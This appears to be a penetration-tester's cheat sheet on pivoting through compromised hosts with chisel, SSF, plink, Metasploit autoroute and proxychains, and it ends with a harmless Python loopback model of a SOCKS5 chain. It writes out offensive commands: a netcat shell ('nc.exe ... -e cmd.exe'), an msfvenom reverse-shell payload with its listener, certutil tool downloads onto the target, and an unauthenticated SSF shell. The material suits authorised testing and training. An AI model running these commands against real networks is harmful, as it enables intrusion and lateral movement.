Nmap pivoting

Upload a statically linked nmap binary to the compromised host and scan the internal network from there. This is the best option for large networks, since none of the scan traffic has to be proxied back through a SOCKS tunnel (where only TCP connect scans work and every probe costs a round trip through the pivot).

Pivoting with weevely via webshell

Once the weevely agent is running on the web server, its network modules can pivot from there:

:net_proxy - Run local proxy to pivot HTTP/HTTPS browsing through the target.
:net_scan  - TCP Port scan.

vim ~/.ngrok2/ngrok.yml

Each tunnel is a named entry under the tunnels: key; the ones used here expose local port 8080 over HTTP and ports 8181 and 8282 as raw TCP:

        addr: 8080
        proto: http

        addr: 8181
        proto: tcp

        addr: 8282
        proto: tcp

./ngrok start --all


Chisel

Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.

--pivoting remote service--
Kali box:
Target box:

kali:> ./chisel server -p 8000 --host --reverse -v
target box:> chisel_windows.exe client R:8081:
kali:> curl localhost:8081

target box:> chisel_windows.exe client R:8445:
kali:> nmap -sT -Pn -p 8445 -v

With --reverse, a client remote of the form R:LPORT:HOST:PORT makes the chisel server on Kali listen on LPORT and hand every connection to the client, which opens it to HOST:PORT from the target's side of the network. The forwarded service therefore appears on Kali's own loopback (8081 and 8445 above), which is why curl and nmap are pointed at localhost.

--socks tunnel--
kali:> ./chisel server -p 8000 --reverse -v
target:> chisel_windows.exe client R:8001:
target:> chisel_windows.exe server -p 9001 --socks5
kali:> ./chisel client localhost:8001 socks

The second chisel process on the target is a plain SOCKS5 server; the first reverse-forwards it back to Kali so that a local chisel client can expose it on 127.0.0.1:1080 (chisel's default SOCKS port). Chisel 1.5 and later do this in one step from the target with chisel_windows.exe client <kali-ip>:8000 R:socks, which makes the server on Kali listen on 1080 itself.

kali:> vim /etc/proxychains.conf
socks5 1080

proxychains curl

Secure Socket Funneling (SSF)

Secure Socket Funneling (SSF) is a network tool and toolkit. It provides simple and efficient ways to forward data from multiple sockets (TCP or UDP) through a single secure TLS tunnel to a remote computer.

1. Upload the certificates to the target machine
2. Download the Windows and Linux binaries from the GitHub repository
3. Execute ssfd (the server) on the Linux side

[2019-09-03T10:34:41-04:00] [info] [config] [tls] CA cert path: <file: ./certs/trusted/ca.crt>
[2019-09-03T10:34:41-04:00] [info] [config] [tls] cert path: <file: ./certs/certificate.crt>
[2019-09-03T10:34:41-04:00] [info] [config] [tls] key path: <file: ./certs/private.key>
[2019-09-03T10:34:41-04:00] [info] [config] [tls] key password: <>
[2019-09-03T10:34:41-04:00] [info] [config] [tls] dh path: <file: ./certs/dh4096.pem>
[2019-09-03T10:34:41-04:00] [info] [config] [tls] cipher suite: <DHE-RSA-AES256-GCM-SHA384>
[2019-09-03T10:34:41-04:00] [info] [config] [http proxy] <None>
[2019-09-03T10:34:41-04:00] [info] [config] [socks proxy] <None>
[2019-09-03T10:34:41-04:00] [info] [config] [circuit] <None>
[2019-09-03T10:34:41-04:00] [info] [ssfd] listening on <*:8011>
[2019-09-03T10:34:41-04:00] [info] [ssfd] running (Ctrl + C to stop)

4. Upload the certificates and ssf client into the target machine (windows)

certutil.exe -urlcache -split -f ssf.exe
certutil.exe -urlcache -split -f certs.zip

Download 7zip command line

:> 7za e certs.zip

./ssf -g -F 1080 -Y 1111 -L -L

On the target host, start the client and point it back at the attacker box, with the following options:

-g       allow gateway ports: lets the client bind local sockets to addresses other than localhost
-F 1080  run a SOCKS proxy on the server (attacker) side on port 1080
-Y 1111  open local port 1111 as a shell on the client
-L       each -L opens a listener on the target machine that forwards back to the attacker box; handy for exploiting further machines that cannot talk to the attacker box directly

The -Y listener is an unauthenticated shell; combined with -g it is bound on all of the target's interfaces, so anyone who can reach port 1111 on the target gets that shell. Drop -g if the shell is only needed from the target itself.

ssf.exe -g -F 1080 -Y 1111

kali:> vim /etc/proxychains.conf
socks5 1080

proxychains curl

Reference: https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html


Plink (SSH remote port forwarding)

On Kali, start sshd and create a throwaway low-privilege user for the target to authenticate as (remove it when the engagement is over):

:> service ssh restart
:> netstat -antp | grep 22
:> adduser pp
:> userdel -r pp (to delete the created user)

Get a shell on the target, then have plink connect back to Kali and remote-forward the internal service:

nc.exe 4444 -e cmd.exe
plink.exe -ssh pp@ -R 3306:localhost:3306
plink.exe -l pp -R 445:

plink -R 445:localhost:445 -pw pp pp@ -N
plink.exe -R 8081:localhost:445 pp@ -N -v

-R LPORT:HOST:PORT makes Kali's sshd listen on LPORT and has plink connect to HOST:PORT from the target; -N opens no shell. The target's SMB service then shows up on Kali as localhost:445, or as 8081 when something on Kali (such as smbd) already occupies 445. Passing the password with -pw leaves it in the target's command history and process list; prefer the interactive prompt or a key.

By default sshd binds remote-forwarded ports to 127.0.0.1 on Kali, which is enough for tools run on Kali itself. Only if other hosts must reach the forwarded port, enable gateway ports in the Kali sshd config (AllowTcpForwarding, which is on by default, must also stay enabled):

vim /etc/ssh/sshd_config
GatewayPorts yes

Reference: https://hackso.me/bighead-htb-walkthrough/

Metasploit tunnel

Create the payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f exe -o meterpreter.exe

Start the listener

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 443

handler -H -P 443 -p windows/meterpreter/reverse_tcp

Type background to send the Meterpreter session to the background; it stays open as session 1.

Add a route to the internal subnet through session 1 (syntax: route add SUBNET NETMASK SESSION)

route add 1

Verify the route: route print

Create the socks4 proxy

use auxiliary/server/socks4a
run

On current Metasploit versions the socks4a and socks5 modules were merged into auxiliary/server/socks_proxy (set VERSION 4a or 5). Either way the proxy listens on 1080 by default and consults the framework routing table, so connections to the routed subnet are carried over the Meterpreter session while everything else is made from Kali directly.

Configure proxychains

vim /etc/proxychains.conf
Edit the ProxyList at the bottom of the file:
socks4   1080

Run your commands

proxychains nmap -Pn -sT -p445,3389
proxychains rdesktop
proxychains firefox

Only full TCP connects are proxied: nmap has to run with -sT and -Pn, because SYN scans, ICMP pings and UDP probes bypass the SOCKS proxy (or hang) and would leave Kali directly.

Auto-route MSF (double pivot)

Imagine you have "www" access to a web server in the DMZ. With this technique you can pivot through the infrastructure from the Internet without exposing ports on your home router.

Inside the Meterpreter session, list the interfaces to find the internal subnet and add a route for it through the session (the autoroute script has been replaced by post/multi/manage/autoroute in newer versions, which takes SUBNET= and NETMASK= options):

:> ifconfig
:> run autoroute -s ip/mask

Background the session, start a SOCKS proxy on 1080 and run the next exploit through the route:

:> search socks4
:> run (1080)
search exploit

Double pivoting with proxychains

First, create a dynamic port forward through the first network:
ssh -f -N -D 9050 root@

Edit /etc/proxychains.conf and set it as the ProxyList entry:
socks4 9050

Use that proxy to reach the second host and open a second dynamic port forward, which egresses on the second network:
proxychains ssh -f -N -D 10050 root@ -p 22

Edit /etc/proxychains.conf again and replace the entry with the new forward (do not keep both: in strict_chain mode proxychains would ask the first hop to connect to 127.0.0.1:10050, which is the first host's own loopback, not the tunnel):
socks4 10050

You can now use proxychains to pivot into the target network:
proxychains nmap -sTV -n -Pn -254
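The following is an added example, not code from this page, from 0xdf's write-ups or from any of the tools above. It models on loopback what the SOCKS pivots set up with ssh -D, chisel --socks5 and ssf -F provide, and what proxychains does with them in the double pivot: a minimal SOCKS5 CONNECT server (handle_socks5), two instances of it standing in for the 9050 and 10050 forwards, a constructed echo server as the "internal" target, and a client that chains through both hops the way proxychains strict_chain does (attacker -> hop1 -> hop2 -> target). All addresses and ports are ephemeral loopback ports chosen by the example itself, and the echo target is constructed; the double pivot is modelled as a client-side chain rather than by nesting ssh -D inside proxychains, but the path the bytes take is the same. It also shows the failure mode a proxied connect scan sees when the last hop cannot reach the port (SOCKS reply 0x05, surfaced as None).

```python
# Added example (not from the page or the tools it cites): a loopback model of a SOCKS5 pivot chain.
import contextlib, socket, struct, threading

def recv_exact(sock, n):
    """Read exactly n bytes; SOCKS fields are fixed-size, so a short read is an error."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-handshake")
        buf += chunk
    return buf

def pump(src, dst):
    """Relay bytes one way until EOF, then tear down both ends so the opposite pump exits too."""
    with contextlib.suppress(OSError):
        for data in iter(lambda: src.recv(4096), b""):
            dst.sendall(data)
    for s in (src, dst):
        with contextlib.suppress(OSError):
            s.shutdown(socket.SHUT_RDWR)

def socks5_handshake(sock, dst):
    """Client side of SOCKS5 (RFC 1928): no-auth greeting, then CONNECT to an IPv4 dst."""
    sock.sendall(b"\x05\x01\x00")                         # VER=5, NMETHODS=1, 0x00 = no auth
    if tuple(recv_exact(sock, 2)) != (5, 0):
        raise ConnectionError("proxy rejected the no-auth method")
    ip, port = dst
    sock.sendall(b"\x05\x01\x00\x01" + socket.inet_aton(ip) + struct.pack(">H", port))
    reply = recv_exact(sock, 10)                           # VER REP RSV ATYP BND.ADDR BND.PORT
    if reply[1] != 0:
        raise ConnectionError("CONNECT %s:%d failed, REP=0x%02x" % (ip, port, reply[1]))

def handle_socks5(client):
    """Server side: no authentication, CONNECT to IPv4 only (what an ssh -D style pivot offers)."""
    try:
        ver, nmethods = recv_exact(client, 2)
        recv_exact(client, nmethods)                       # offered methods; assumes 0x00 is among them
        client.sendall(b"\x05\x00")
        _, cmd, _, atyp = recv_exact(client, 4)
        if ver != 5 or cmd != 1 or atyp != 1:
            client.sendall(b"\x05\x07\x00\x01" + bytes(6))   # REP 0x07: command not supported
            return client.close()
        dst = (socket.inet_ntoa(recv_exact(client, 4)), struct.unpack(">H", recv_exact(client, 2))[0])
        try:
            upstream = socket.create_connection(dst, timeout=3)
        except OSError:                                    # nothing listening on the far network
            client.sendall(b"\x05\x05\x00\x01" + bytes(6))   # REP 0x05: connection refused
            return client.close()
        upstream.settimeout(None)
        client.sendall(b"\x05\x00\x00\x01" + bytes(6))       # REP 0x00: succeeded, BND 0.0.0.0:0
        for a, b in ((client, upstream), (upstream, client)):
            threading.Thread(target=pump, args=(a, b), daemon=True).start()
    except OSError:
        client.close()

def serve(on_conn):
    """Listen on an ephemeral loopback port; each connection goes to on_conn on its own thread."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)
    def loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=on_conn, args=(conn,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()

def echo(conn): pump(conn, conn)                            # constructed 'internal' target: echoes input

def closed_port():
    with socket.socket() as s:                             # bind an ephemeral port, then release it
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]

def send_through_chain(chain, dst, message):
    """proxychains strict_chain in miniature: CONNECT through each hop to the next, then to dst,
    send message and return dst's reply. None means the last hop could not connect, which is
    exactly what a proxied nmap -sT reports as a closed port."""
    sock = socket.create_connection(chain[0])
    with sock:
        try:
            for nxt in list(chain[1:]) + [dst]:
                socks5_handshake(sock, nxt)
        except ConnectionError:
            return None
        sock.sendall(message)
        return recv_exact(sock, len(message))

if __name__ == "__main__":
    chain = [serve(handle_socks5), serve(handle_socks5)]  # stands in for -D 9050 and -D 10050
    print(send_through_chain(chain, serve(echo), b"hello via two hops"))
    print(send_through_chain(chain, ("127.0.0.1", closed_port()), b"probe"))
```

Running the file prints the echoed bytes for the reachable target and None for the closed port. In proxychains terms chain[0] is the 9050 entry and chain[1] the 10050 one: the handshake with the second hop travels inside the first hop's CONNECT, so a port the second hop cannot reach comes back as a SOCKS reply relayed by hop1 rather than as a TCP error on Kali, which is why proxied scans need -sT and never see ICMP or SYN-level detail.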
